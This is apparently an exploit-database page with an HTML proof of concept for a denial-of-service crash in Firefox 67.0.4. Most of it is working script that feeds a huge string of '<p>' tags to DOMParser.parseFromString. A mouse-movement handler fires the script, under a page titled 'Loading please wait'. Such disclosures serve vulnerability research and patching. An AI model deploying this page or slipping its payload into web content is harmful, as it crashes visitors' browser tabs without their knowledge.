894b9e59aa
3 changes to exploits/shellcodes Firefox 67.0.4 - Denial of Service Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) WordPress Plugin Like Button 1.6.0 - Authentication Bypass
52 lines
No EOL
2.2 KiB
HTML
52 lines
No EOL
2.2 KiB
HTML
<!--
|
|
Exploit Title: DOMParser Denial of Service on Firefox 67.0.4
|
|
|
|
Date: 09/07/2019
|
|
|
|
Description: pass a huge string as an argument to DOMParser.parseFromString will crash the tab in Firefox version 67.0.4.
|
|
|
|
Exploit Author:Tejas Ajay Naik
|
|
|
|
Vendor Homepage:
|
|
|
|
Software Link: https://ftp.mozilla.org/pub/firefox/releases/
|
|
|
|
Version: 67.0.4
|
|
|
|
Tested On: Linux x86,Windows x64 1803
|
|
|
|
CVE:
|
|
-->
|
|
<!DOCTYPE html>
|
|
<head>
|
|
<title>
|
|
Loading please wait
|
|
</title>
|
|
|
|
<script>
|
|
function MyFun() {
|
|
|
|
var text = [];
|
|
for(var i=0 ;i<300 ; ++i)
|
|
text += "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
|
|
"<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>";
|
|
var domparser = new DOMParser();
|
|
var doc = domparser.parseFromString(text,"application/xhtml+xml");
|
|
}
|
|
</script>
|
|
|
|
</head>
|
|
|
|
<body>
|
|
<input type="button" onmousemove="MyFun()" value="click"/>
|
|
<p id="demo"></p>
|
|
</body>
|
|
</html> |